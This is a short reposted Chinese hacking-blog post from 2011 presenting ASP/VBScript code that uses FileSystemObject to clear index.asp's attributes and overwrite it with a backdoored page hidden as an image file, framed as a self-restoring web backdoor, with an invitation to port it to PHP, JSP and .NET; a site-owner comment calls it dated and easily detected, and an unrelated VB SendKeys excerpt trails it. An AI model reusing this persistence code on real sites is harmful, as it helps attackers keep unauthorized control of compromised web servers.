转载自:http://hi.baidu.com/micropoor
//2011-11-15 星期二
// 管理员的思维:
查找asp,php,jsp,.net脚本文件关键词
//我们的思维:
Set fso = CreateObject("Scripting.FileSystemObject")
sFile = Server.Mappath("/index.asp")
Set objFile = fso.GetFile(sFile)
if objFile.attributes 32 then:objFile.attributes = 32:end if
fso.CopyFile Server.Mappath("/images/Micropoor.gif"),Server.Mappath("/index.asp")
%>
//一箭双雕:
那么我们可不可以把它作为index.php的还原精灵呢?它不仅仅是后门,更是我们的影子系统。
//课后题:
聪明的你,一定会把它演变成PHP,JSP,.NET等
|
结论:站在“敌人”的角度考虑,往往你就是赢家。
站长评论:
这种没用的,早已经将 FSO 组件作为关键词了。
而且手法也相当古老了,只能蒙混小白。
并且很多机器 FSO 早卸载了,后门需要支持的东西越少越好。
还不如:
更爽一些。
文章来源于lcx.cc:Php安全新闻早8点(2011-11-15 星期二)
相关推荐: 【VB】SendKeys 语句详解
SendKeys 语句 描述 将一个或多个按键消息发送到活动窗口,就如同用键盘进行输入一样。 语法 SendKeys string[, wait] 参数意义: string部分必需的,字符串表达式,指定要发送的按键消息。…
评论